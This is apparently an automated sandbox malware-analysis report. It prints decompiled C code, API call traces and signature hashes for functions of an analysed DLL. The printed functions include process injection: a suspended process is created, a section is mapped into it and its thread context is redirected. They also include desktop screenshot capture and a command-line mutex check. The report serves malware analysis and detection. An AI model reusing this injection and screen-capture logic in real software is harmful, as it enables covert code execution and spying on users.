                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 7098312E
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 70983145
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 7098314C
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 70983168
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 70983183
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 709831A1
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 709831A8
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 709831CB
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 709831D8
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 709831DF
                                                                                                        • GetTickCount.KERNEL32 ref: 709831E5
                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 70983207
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?), ref: 7098321A
                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 70983221
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 7098322D
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 70983234
                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 70983245
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 7098324D
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 70983254
                                                                                                        • CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 70983265
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 7098326C
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 70983277
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AllocByteCharCloseHandleMultiWide$Free$CountCreateFileMemoryReadTickZero$PipeTerminate
                                                                                                        • String ID: D
                                                                                                        • API String ID: 1574224466-2746444292
                                                                                                        • Opcode ID: 4b185f0ab58becfbc59733e7e17da8be5005d7d2f501e4b8d7273768b941d06e
                                                                                                        • Instruction ID: e95f23573f159bb962ebd361bcf4747b035641c09eb5630f87b2fd3923f56b20
                                                                                                        • Opcode Fuzzy Hash: 4b185f0ab58becfbc59733e7e17da8be5005d7d2f501e4b8d7273768b941d06e
                                                                                                        • Instruction Fuzzy Hash: 7A714EB2658301ABD3109FA6CC89F5BBBECABC4B40F10492DB656D73D0D674E8049B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982440, Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 167librarythreadstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 96%
                                                                                                        			E70982440() {
				short _v532;
				short _v540;
				WCHAR* _v544;
				struct _SECURITY_ATTRIBUTES* _v548;
				struct _SECURITY_ATTRIBUTES* _v552;
				struct _SECURITY_ATTRIBUTES* _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				void* _v568;
				struct HINSTANCE__* _v584;
				struct HINSTANCE__* _v588;
				struct HINSTANCE__* _v592;
				struct HINSTANCE__* _v596;
				void _v600;
				char _v604;
				char _v608;
				char _v616;
				short* _t42;
				int _t50;
				char _t51;
				WCHAR* _t53;
				short* _t54;
				void* _t58;
				intOrPtr _t64;
				void* _t67;
				long _t77;
				void* _t78;
				void* _t92;
				signed int _t95;
				void* _t96;
				void* _t98;

				_v584 = LoadLibraryW(L"user32.dll");
				_v592 = LoadLibraryW(L"shlwapi.dll");
				_v588 = LoadLibraryW(L"shell32.dll");
				_t42 = GetCommandLineW();
				_v600 = 0;
				_t92 = CommandLineToArgvW(_t42,  &_v600);
				if(_t92 == 0) {
					L24:
					FreeLibrary(_v592);
					FreeLibrary(_v600);
					FreeLibrary(_v596);
					ExitProcess(0);
				}
				if(_v608 <= 1) {
					L23:
					LocalFree(_t92);
					goto L24;
				} else {
					_t95 = 1;
					do {
						_t50 = lstrcmpiW( *(_t92 + _t95 * 4), L"-svcr");
						_t51 = _v608;
						if(_t50 != 0) {
							goto L5;
						}
						_t95 = _t95 + 1;
						if(_t95 < _t51) {
							_t53 = StrRChrW( *(_t92 + _t95 * 4), 0, 0x5c);
							if(_t53 == 0) {
								break;
							}
							_t54 =  &(_t53[1]);
							if(_t54 != 0 &&  *_t54 != 0) {
								wsprintfW( &_v540, L"%s%s",  &((StrChrW(0x7098c490, 0x2e))[1]), _t54);
								_t58 = OpenEventW(2, 0,  &_v532);
								if(_t58 != 0) {
									CloseHandle(_t58);
									break;
								}
								_t98 = CreateEventW(0, 1, 0,  &_v532);
								_t77 = 0;
								if(_t98 != 0) {
									_push(0x3c);
									_push( &_v592);
									L7098BF02();
									_v616 = 0;
									_t64 = E709822F0( *(_t92 + _t95 * 4),  &_v616);
									if(_t64 != 0) {
										_v564 = _t64;
										_v560 = _v616;
										_v556 = 0;
										_v552 = 0;
										_v548 = 0;
										_v544 =  *(_t92 + _t95 * 4);
										_t96 = CreateThread(0, 0, E709823D0,  &_v600, 0, 0);
										if(_t96 != 0) {
											_t78 = E70981D90(_v568, _v564, 0,  &_v604);
											if(_v568 != 0) {
												NtTerminateThread(_t96, 0);
												if(_t78 == 0) {
													E70981C90( &_v608);
												}
											}
											CloseHandle(_t96);
											_t77 = 0;
										}
										_t67 = _v568;
										if(_t67 != _t77) {
											VirtualFree(_t67, _t77, 0x8000);
										}
									}
								}
								CloseHandle(_t98);
							}
							break;
						}
						L5:
						_t95 = _t95 + 1;
					} while (_t95 < _t51);
					goto L23;
				}
			}


































                                                                                                        0x7098245a
                                                                                                        0x70982465
                                                                                                        0x7098246b
                                                                                                        0x7098246f
                                                                                                        0x7098247b
                                                                                                        0x70982489
                                                                                                        0x7098248d
                                                                                                        0x70982628
                                                                                                        0x70982633
                                                                                                        0x7098263a
                                                                                                        0x70982641
                                                                                                        0x70982645
                                                                                                        0x70982645
                                                                                                        0x7098249a
                                                                                                        0x70982621
                                                                                                        0x70982622
                                                                                                        0x00000000
                                                                                                        0x709824a0
                                                                                                        0x709824a7
                                                                                                        0x709824b0
                                                                                                        0x709824b9
                                                                                                        0x709824bd
                                                                                                        0x709824c1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709824c3
                                                                                                        0x709824c6
                                                                                                        0x709824da
                                                                                                        0x709824e2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709824e8
                                                                                                        0x709824eb
                                                                                                        0x70982517
                                                                                                        0x70982529
                                                                                                        0x70982531
                                                                                                        0x7098261a
                                                                                                        0x00000000
                                                                                                        0x7098261a
                                                                                                        0x70982549
                                                                                                        0x7098254b
                                                                                                        0x7098254f
                                                                                                        0x70982555
                                                                                                        0x7098255b
                                                                                                        0x7098255c
                                                                                                        0x7098256a
                                                                                                        0x7098256e
                                                                                                        0x70982578
                                                                                                        0x70982587
                                                                                                        0x70982597
                                                                                                        0x7098259b
                                                                                                        0x7098259f
                                                                                                        0x709825a3
                                                                                                        0x709825a7
                                                                                                        0x709825b1
                                                                                                        0x709825b5
                                                                                                        0x709825d4
                                                                                                        0x709825d6
                                                                                                        0x709825db
                                                                                                        0x709825e2
                                                                                                        0x709825e9
                                                                                                        0x709825ee
                                                                                                        0x709825e2
                                                                                                        0x709825f2
                                                                                                        0x709825f8
                                                                                                        0x709825f8
                                                                                                        0x709825fa
                                                                                                        0x70982600
                                                                                                        0x70982609
                                                                                                        0x70982609
                                                                                                        0x70982600
                                                                                                        0x70982578
                                                                                                        0x70982610
                                                                                                        0x70982616
                                                                                                        0x00000000
                                                                                                        0x709824eb
                                                                                                        0x709824c8
                                                                                                        0x709824c8
                                                                                                        0x709824c9
                                                                                                        0x00000000
                                                                                                        0x70982620

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 70982453
                                                                                                        • LoadLibraryW.KERNEL32(shlwapi.dll), ref: 7098245E
                                                                                                        • LoadLibraryW.KERNEL32(shell32.dll), ref: 70982469
                                                                                                        • GetCommandLineW.KERNEL32 ref: 7098246F
                                                                                                        • CommandLineToArgvW.SHELL32 ref: 70982483
                                                                                                        • lstrcmpiW.KERNEL32(?,-svcr), ref: 709824B9
                                                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C,?,-svcr), ref: 709824DA
                                                                                                        • StrChrW.SHLWAPI(7098C490,0000002E,-00000002,?,-svcr), ref: 70982503
                                                                                                        • wsprintfW.USER32 ref: 70982517
                                                                                                        • OpenEventW.KERNEL32(00000002,00000000,?,?,?), ref: 70982529
                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,?,?,?,?), ref: 70982543
                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 7098255C
                                                                                                        • CreateThread.KERNEL32 ref: 709825AB
                                                                                                        • NtTerminateThread.NTDLL(00000000,00000000), ref: 709825DB
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 709825F2
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?), ref: 70982609
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 70982610
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 70982622
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 70982633
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 7098263A
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 70982641
                                                                                                        • ExitProcess.KERNEL32 ref: 70982645
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Library$Free$Load$CloseCommandCreateEventHandleLineThread$ArgvExitLocalMemoryOpenProcessTerminateVirtualZerolstrcmpiwsprintf
                                                                                                        • String ID: %s%s$-svcr$shell32.dll$shlwapi.dll$user32.dll
                                                                                                        • API String ID: 3497841958-2948745756
                                                                                                        • Opcode ID: 2dc47ad90e448c70427d6f42ac5771fe29b6f79f89257bb17f8db90fc4f67a13
                                                                                                        • Instruction ID: be15a505294d50f1534ef3f116f390c61e43f134eb328bd2698e5ae62dd2deb2
                                                                                                        • Opcode Fuzzy Hash: 2dc47ad90e448c70427d6f42ac5771fe29b6f79f89257bb17f8db90fc4f67a13
                                                                                                        • Instruction Fuzzy Hash: 62512AB2518301AFD3109FA5CC88B6FB7ECEB88744F104929F646963D1D774E8449BA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70986B70, Relevance: 34.7, APIs: 23, Instructions: 239windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 59%
                                                                                                        			E70986B70() {
				intOrPtr* _v140;
				void** _v144;
				struct tagRECT _v164;
				long _v168;
				struct HDC__* _v172;
				int _v180;
				int _v184;
				void _v188;
				int _v192;
				int _v196;
				struct tagCURSORINFO _v212;
				struct HDC__* _v216;
				intOrPtr _v224;
				intOrPtr _v228;
				struct HICON__* _v232;
				intOrPtr _v252;
				intOrPtr _v256;
				void* _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				struct HDC__* _v288;
				struct HDC__* _v304;
				long _v308;
				intOrPtr _v316;
				struct HDC__* _v320;
				intOrPtr _v324;
				struct HDC__* _t61;
				struct HDC__* _t62;
				int _t67;
				void* _t70;
				int _t75;
				intOrPtr _t91;
				int _t99;
				long _t101;
				int _t103;
				struct HWND__* _t136;
				void* _t137;
				int _t138;
				struct HDC__* _t139;
				intOrPtr _t140;
				int _t142;
				void* _t144;

				_v168 = 0;
				_t136 = GetDesktopWindow();
				_v164.left = _t136;
				_t61 = GetDC(_t136);
				_t139 = _t61;
				_v172 = _t139;
				if(_t139 != 0) {
					_t62 = CreateCompatibleDC(_t139);
					_v188 = _t62;
					if(_t62 != 0) {
						_push(0x10);
						_push( &(_v164.right));
						L7098BF02();
						GetWindowRect(_t136,  &_v164);
						_t103 = _v164.bottom;
						_t67 = _v164.right;
						_t99 = _t67;
						_t142 = _t103;
						_t137 = CreateCompatibleBitmap(_t139, _t67, _t103);
						_v212.hCursor = _t137;
						if(_t137 != 0) {
							_t70 = SelectObject(_v212.flags, _t137);
							if(_t70 != 0 && _t70 != 0xffffffff && BitBlt(_v216, _v184, _v180, _t99, _t142, _t139, 0, 0, 0x40cc0020) != 0) {
								_push(0x14);
								_push( &(_v212.hCursor));
								L7098BF02();
								_v212.cbSize = 0x14;
								_t75 = GetCursorInfo( &_v212);
								if(_t75 != 0 && _v212.flags == 1) {
									_push(0x14);
									_push( &_v192);
									L7098BF02();
									_t75 = GetIconInfo(_v212.cbSize,  &(_v212.ptScreenPos));
									if(_t75 != 0) {
										_push(0x18);
										_push( &_v180);
										L7098BF02();
										GetObjectW(_v192, 0x18,  &_v188);
										_t75 = DrawIconEx(_v288, _v228 - _v256 + _v256 - _v216, _v224 - _v252 + _v252 - _v212, _v232, _v196, _v192, 0, 0, 3);
									}
								}
								__imp__#12(0, 0);
								_t138 = _t75;
								if(_t138 != 0) {
									_push(_t138);
									_push(_t142);
									_push(_t99);
									_push( &_v264);
									if(E70986910() != 0) {
										_push(0x48);
										_push( &(_v164.right));
										L7098BF02();
										_push(1);
										_push( &_v164);
										_push(_t138);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x30))))() >= 0) {
											_t101 = _v168;
											if(_t101 != 0) {
												_t144 = VirtualAlloc(0, _t101, 0x1000, 4);
												if(_t144 != 0) {
													_push(8);
													_push( &_v264);
													L7098BF02();
													_push(0);
													asm("xorpd xmm0, xmm0");
													asm("movlpd [esp+0x2c], xmm0");
													_push(0);
													_push(_v268);
													_push(_v272);
													_push(_t138);
													if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x14))))() < 0) {
														L24:
														VirtualFree(_t144, 0, 0x8000);
													} else {
														_t140 = 0;
														if(_t101 == 0) {
															L23:
															_t139 = _v304;
															goto L24;
														} else {
															while(1) {
																_push( &_v308);
																_push(_t101 - _t140);
																_push(_t140 + _t144);
																_push(_t138);
																_v308 = 0;
																if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() < 0) {
																	break;
																}
																_t91 = _v324;
																if(_t91 != 0) {
																	_t140 = _t140 + _t91;
																	if(_t140 < _t101) {
																		continue;
																	}
																}
																break;
															}
															if(_t140 == 0) {
																goto L23;
															} else {
																 *_v140 = _t140;
																_t139 = _v320;
																 *_v144 = _t144;
																_v316 = 1;
															}
														}
													}
												}
											}
										}
									}
									 *((intOrPtr*)( *((intOrPtr*)( *_t138 + 8))))(_t138);
								}
								_t137 = _v264;
							}
							DeleteObject(_t137);
						}
						DeleteDC(_v212.flags);
						_t136 = _v192;
					}
					ReleaseDC(_t136, _t139);
					return _v172;
				} else {
					return _t61;
				}
			}













































                                                                                                        0x70986b78
                                                                                                        0x70986b86
                                                                                                        0x70986b89
                                                                                                        0x70986b8d
                                                                                                        0x70986b93
                                                                                                        0x70986b95
                                                                                                        0x70986b9b
                                                                                                        0x70986ba7
                                                                                                        0x70986bad
                                                                                                        0x70986bb3
                                                                                                        0x70986bbb
                                                                                                        0x70986bc1
                                                                                                        0x70986bc2
                                                                                                        0x70986bcd
                                                                                                        0x70986bd3
                                                                                                        0x70986bd7
                                                                                                        0x70986bde
                                                                                                        0x70986be0
                                                                                                        0x70986be8
                                                                                                        0x70986bea
                                                                                                        0x70986bf0
                                                                                                        0x70986bfc
                                                                                                        0x70986c04
                                                                                                        0x70986c3c
                                                                                                        0x70986c42
                                                                                                        0x70986c43
                                                                                                        0x70986c4d
                                                                                                        0x70986c55
                                                                                                        0x70986c5d
                                                                                                        0x70986c6e
                                                                                                        0x70986c74
                                                                                                        0x70986c75
                                                                                                        0x70986c84
                                                                                                        0x70986c8c
                                                                                                        0x70986c8e
                                                                                                        0x70986c94
                                                                                                        0x70986c95
                                                                                                        0x70986ca6
                                                                                                        0x70986cea
                                                                                                        0x70986cea
                                                                                                        0x70986c8c
                                                                                                        0x70986cf4
                                                                                                        0x70986cfa
                                                                                                        0x70986cfe
                                                                                                        0x70986d04
                                                                                                        0x70986d05
                                                                                                        0x70986d0a
                                                                                                        0x70986d0b
                                                                                                        0x70986d16
                                                                                                        0x70986d1c
                                                                                                        0x70986d25
                                                                                                        0x70986d26
                                                                                                        0x70986d30
                                                                                                        0x70986d39
                                                                                                        0x70986d3a
                                                                                                        0x70986d3f
                                                                                                        0x70986d45
                                                                                                        0x70986d4e
                                                                                                        0x70986d64
                                                                                                        0x70986d68
                                                                                                        0x70986d6e
                                                                                                        0x70986d74
                                                                                                        0x70986d75
                                                                                                        0x70986d7f
                                                                                                        0x70986d81
                                                                                                        0x70986d85
                                                                                                        0x70986d93
                                                                                                        0x70986d95
                                                                                                        0x70986d96
                                                                                                        0x70986d97
                                                                                                        0x70986d9c
                                                                                                        0x70986dfc
                                                                                                        0x70986e04
                                                                                                        0x70986d9e
                                                                                                        0x70986d9e
                                                                                                        0x70986da2
                                                                                                        0x70986df8
                                                                                                        0x70986df8
                                                                                                        0x00000000
                                                                                                        0x70986da4
                                                                                                        0x70986da4
                                                                                                        0x70986daa
                                                                                                        0x70986daf
                                                                                                        0x70986db6
                                                                                                        0x70986db7
                                                                                                        0x70986db8
                                                                                                        0x70986dc4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986dc6
                                                                                                        0x70986dcc
                                                                                                        0x70986dce
                                                                                                        0x70986dd2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986dd2
                                                                                                        0x00000000
                                                                                                        0x70986dcc
                                                                                                        0x70986dd6
                                                                                                        0x00000000
                                                                                                        0x70986dd8
                                                                                                        0x70986de6
                                                                                                        0x70986de8
                                                                                                        0x70986dec
                                                                                                        0x70986dee
                                                                                                        0x70986dee
                                                                                                        0x70986dd6
                                                                                                        0x70986da2
                                                                                                        0x70986d9c
                                                                                                        0x70986d68
                                                                                                        0x70986d4e
                                                                                                        0x70986d3f
                                                                                                        0x70986e10
                                                                                                        0x70986e10
                                                                                                        0x70986e12
                                                                                                        0x70986e12
                                                                                                        0x70986e17
                                                                                                        0x70986e17
                                                                                                        0x70986e22
                                                                                                        0x70986e28
                                                                                                        0x70986e2d
                                                                                                        0x70986e30
                                                                                                        0x70986e42
                                                                                                        0x70986ba5
                                                                                                        0x70986ba5
                                                                                                        0x70986ba5

                                                                                                        APIs
                                                                                                        • GetDesktopWindow.USER32 ref: 70986B80
                                                                                                        • GetDC.USER32(00000000), ref: 70986B8D
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 70986BA7
                                                                                                        • RtlZeroMemory.NTDLL(?,00000010), ref: 70986BC2
                                                                                                        • GetWindowRect.USER32 ref: 70986BCD
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 70986BE2
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 70986BFC
                                                                                                        • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,40CC0020), ref: 70986C2E
                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 70986C43
                                                                                                        • GetCursorInfo.USER32(?,?,?,?,?,?,?,?,?,?,00000014), ref: 70986C55
                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 70986C75
                                                                                                        • GetIconInfo.USER32(?,?), ref: 70986C84
                                                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 70986C95
                                                                                                        • GetObjectW.GDI32(?,00000018,?,?,00000018,?,?,?,?,?,?,?,?,?,?,00000014), ref: 70986CA6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MemoryZero$CompatibleCreateInfoObjectWindow$BitmapCursorDesktopIconRectSelect
                                                                                                        • String ID:
                                                                                                        • API String ID: 3821519111-0
                                                                                                        • Opcode ID: 251bee4a6f9b99f642c93a0df06c4f72a4a2349a1a7f7b3bc20956e4fdef32e4
                                                                                                        • Instruction ID: 7db3ced41128a817097a6f48cd88415abcdeb05386b0bab78c637153d034ca2e
                                                                                                        • Opcode Fuzzy Hash: 251bee4a6f9b99f642c93a0df06c4f72a4a2349a1a7f7b3bc20956e4fdef32e4
                                                                                                        • Instruction Fuzzy Hash: C6812776208302AFD310DF65CD84F6FB7B8AB88B44F10491DF6869B390DB70E8059B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709827F0, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 125memorynativethreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 63%
                                                                                                        			E709827F0(WCHAR* _a4) {
				intOrPtr _v564;
				struct _CONTEXT _v736;
				struct _STARTUPINFOW _v804;
				struct _PROCESS_INFORMATION _v820;
				void* _v824;
				void* _v828;
				intOrPtr _t25;
				long* _t41;
				WCHAR* _t54;
				void* _t56;
				void* _t59;

				_t54 = _a4;
				_t41 = 0;
				if(GetFileAttributesW(_t54) == 0xffffffff) {
					return 0;
				} else {
					_t59 = HeapAlloc(GetProcessHeap(), 8, 0x618);
					if(_t59 != 0) {
						_push(_t54);
						_push(StrChrW(0x7098c530, 0x2d));
						_push(StrChrW(0x7098c514, 0x72));
						_t25 =  *0x7098f578; // 0xb63c90
						_push(_t25);
						wsprintfW(_t59, StrChrW(0x7098c4f4, 0x22));
						_push(0x44);
						_push( &(_v804.dwX));
						L7098BF02();
						_push(0x10);
						_push( &(_v820.dwProcessId));
						_v804.lpDesktop = 0x44;
						L7098BF02();
						if(CreateProcessW(0, _t59, 0, 0, 0, 4, 0, 0,  &_v804,  &_v820) != 0) {
							_push(_v820.hProcess);
							_t56 = E709826E0();
							if(_t56 == 0) {
								L8:
								_push(0);
								_push(_v820.hProcess);
								L7098BF20();
							} else {
								_v736 = 0x10002;
								if(NtGetContextThread(_v820.hThread,  &_v736) < 0) {
									goto L8;
								} else {
									_v564 = E70982440 -  *0x7098f53c + _t56;
									if(NtSetContextThread(_v820,  &(_v804.hStdError)) < 0 || NtResumeThread(_v824, 0) < 0) {
										goto L8;
									} else {
										_t41 = 1;
									}
								}
							}
							CloseHandle(_v824);
							CloseHandle(_v828);
						}
						HeapFree(GetProcessHeap(), 0, _t59);
					}
					return _t41;
				}
			}














                                                                                                        0x709827f8
                                                                                                        0x70982800
                                                                                                        0x7098280b
                                                                                                        0x70982957
                                                                                                        0x70982811
                                                                                                        0x70982829
                                                                                                        0x7098282d
                                                                                                        0x70982833
                                                                                                        0x70982843
                                                                                                        0x7098284d
                                                                                                        0x7098284e
                                                                                                        0x70982853
                                                                                                        0x7098285f
                                                                                                        0x70982868
                                                                                                        0x7098286e
                                                                                                        0x7098286f
                                                                                                        0x70982874
                                                                                                        0x7098287a
                                                                                                        0x7098287b
                                                                                                        0x70982883
                                                                                                        0x709828a3
                                                                                                        0x709828ad
                                                                                                        0x709828b3
                                                                                                        0x709828ba
                                                                                                        0x70982914
                                                                                                        0x70982918
                                                                                                        0x7098291a
                                                                                                        0x7098291b
                                                                                                        0x709828bc
                                                                                                        0x709828c6
                                                                                                        0x709828d5
                                                                                                        0x00000000
                                                                                                        0x709828d7
                                                                                                        0x709828ee
                                                                                                        0x709828fc
                                                                                                        0x00000000
                                                                                                        0x7098290d
                                                                                                        0x7098290d
                                                                                                        0x7098290d
                                                                                                        0x709828fc
                                                                                                        0x709828d5
                                                                                                        0x7098292b
                                                                                                        0x70982932
                                                                                                        0x70982932
                                                                                                        0x7098293a
                                                                                                        0x7098293a
                                                                                                        0x7098294c
                                                                                                        0x7098294c

                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 70982802
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000618), ref: 70982820
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70982823
                                                                                                        • StrChrW.SHLWAPI(7098C530,0000002D,?), ref: 70982841
                                                                                                        • StrChrW.SHLWAPI(7098C514,00000072,00000000), ref: 7098284B
                                                                                                        • StrChrW.SHLWAPI(7098C4F4,00000022,00B63C90,00000000), ref: 7098285B
                                                                                                        • wsprintfW.USER32 ref: 7098285F
                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 7098286F
                                                                                                        • RtlZeroMemory.NTDLL ref: 70982883
                                                                                                        • CreateProcessW.KERNEL32 ref: 7098289B
                                                                                                        • NtGetContextThread.NTDLL ref: 709828CE
                                                                                                        • NtSetContextThread.NTDLL(?,?), ref: 709828F5
                                                                                                        • NtResumeThread.NTDLL(?,00000000), ref: 70982904
                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 7098291B
                                                                                                        • CloseHandle.KERNEL32(?,00000044), ref: 7098292B
                                                                                                        • CloseHandle.KERNEL32(?), ref: 70982932
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70982937
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098293A
                                                                                                          • Part of subcall function 709826E0: RtlZeroMemory.NTDLL(?,00000008), ref: 70982709
                                                                                                          • Part of subcall function 709826E0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 7098272B
                                                                                                          • Part of subcall function 709826E0: NtMapViewOfSection.NTDLL(?,000000FF,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 70982759
                                                                                                          • Part of subcall function 709826E0: NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 70982782
                                                                                                          • Part of subcall function 709826E0: RtlMoveMemory.NTDLL(?,70980000,?), ref: 70982796
                                                                                                          • Part of subcall function 709826E0: NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 709827CD
                                                                                                          • Part of subcall function 709826E0: NtClose.NTDLL(?), ref: 709827D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HeapMemoryProcessSection$CloseThreadViewZero$ContextCreateHandle$AllocAttributesFileFreeMoveResumeTerminateUnmapwsprintf
                                                                                                        • String ID: D
                                                                                                        • API String ID: 4033018722-2746444292
                                                                                                        • Opcode ID: 0a2e2e498110d9def551f24f4df53bf2600072db6ea414930ae9d41a1152523c
                                                                                                        • Instruction ID: 670fba86fea66ca5cb8483b807fb8e2d5b09ef9a435a3d265a7417c02a7c9289
                                                                                                        • Opcode Fuzzy Hash: 0a2e2e498110d9def551f24f4df53bf2600072db6ea414930ae9d41a1152523c
                                                                                                        • Instruction Fuzzy Hash: 3431BFB2208305AFD210DB66CD85FAFB7ACEBC4758F10491DB645933D0D674E8058A73
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

